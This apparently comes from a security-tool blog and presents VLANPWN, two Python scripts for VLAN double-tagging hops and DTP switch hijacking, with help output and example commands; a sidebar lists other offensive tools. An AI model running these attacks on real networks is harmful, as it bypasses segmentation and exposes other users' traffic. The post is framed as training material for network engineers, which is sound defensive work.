Kali Linux

VLANPWN : VLAN Attacks Toolkit

VLAN attacks toolkit, the author has nothing to do with those who will use these tools for personal purposes to destroy other people’s computer networks. The tools are presented for training purposes to help engineers improve the security of their network.

DoubleTagging.py – This tool is designed to carry out a VLAN Hopping attack. As a result of injection of a frame with two 802.1Q tags, a test ICMP request will also be sent.

DTPHijacking.py – A script for conducting a DTP Switch Spoofing/Hijacking attack. Sends a malicious DTP-Desirable frame, as a result of which the attacker’s machine becomes a trunk channel. The impact of this attack is that you can bypass the segmentation of VLAN networks and see all the traffic of VLAN networks.

python3 DoubleTagging.py –help
.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%S
SS S%S SS SS S%S SSS. S%S SS S%S SS S%S S%S SSS. S%S
SS S%S SS SSSs. S%S SS S.S%S SS .sS::' SS S%S S%S SSS.S%S
SS S%S SS SS S%S SS sS%S SS SS S%S S%S SSsS%S
SS :; SS SS:; SS :; SS SS:; :; SS:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
:;;:':;;;;;:’ :; ;:’ :; ;:’ ::;;:’`::’ :; ;:’
VLAN Double Tagging inject tool. Jump into another VLAN!
Author: @necreas1ng, necreas1ng@protonmail.com
usage: DoubleTagging.py [-h] –interface INTERFACE –nativevlan NATIVEVLAN –targetvlan TARGETVLAN –victim VICTIM –attacker ATTACKER
options:
-h, –help show this help message and exit
–interface INTERFACE
Specify your network interface
–nativevlan NATIVEVLAN
Specify the Native VLAN ID
–targetvlan TARGETVLAN
Specify the target VLAN ID for attack
–victim VICTIM Specify the target IP
–attacker ATTACKER Specify the attacker IP

Example:

python3 DoubleTagging.py –interface eth0 –nativevlan 1 –targetvlan 20 –victim 10.10.20.24 –attacker 10.10.10.54

python3 DTPHijacking.py –help
.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%S
SS S%S SS SS S%S SSS. S%S SS S%S SS S%S S%S SSS. S%S
SS S%S SS SSSs. S%S SS S.S%S SS .sS::' SS S%S S%S SSS.S%S
SS S%S SS SS S%S SS sS%S SS SS S%S S%S SSsS%S
SS :; SS SS:; SS :; SS SS:; :; SS:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
:;;:':;;;;;:’ :; ;:’ :; ;:’ ::;;:’`::’ :; ;:’
DTP Switch Hijacking tool. Become a trunk!
Author: @necreas1ng, necreas1ng@protonmail.com
usage: DTPHijacking.py [-h] –interface INTERFACE
options:
-h, –help show this help message and exit
–interface INTERFACE
Specify your network interface

Example:

python3 DTPHijacking.py –interface eth0

R K

Recent Posts

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

7 days ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

2 weeks ago

Red Team Certification – A Comprehensive Guide To Advancing In Cybersecurity Operations

Embark on the journey of becoming a certified Red Team professional with our definitive guide.…

2 weeks ago

CVE-2024-5836 / CVE-2024-6778 : Chromium Sandbox Escape via Extension Exploits

This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…

3 weeks ago

Rust BOFs – Unlocking New Potentials In Cobalt Strike

This took me like 4 days (+2 days for an update), but I got it…

3 weeks ago

MaLDAPtive – Pioneering LDAP SearchFilter Parsing And Security Framework

MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…

3 weeks ago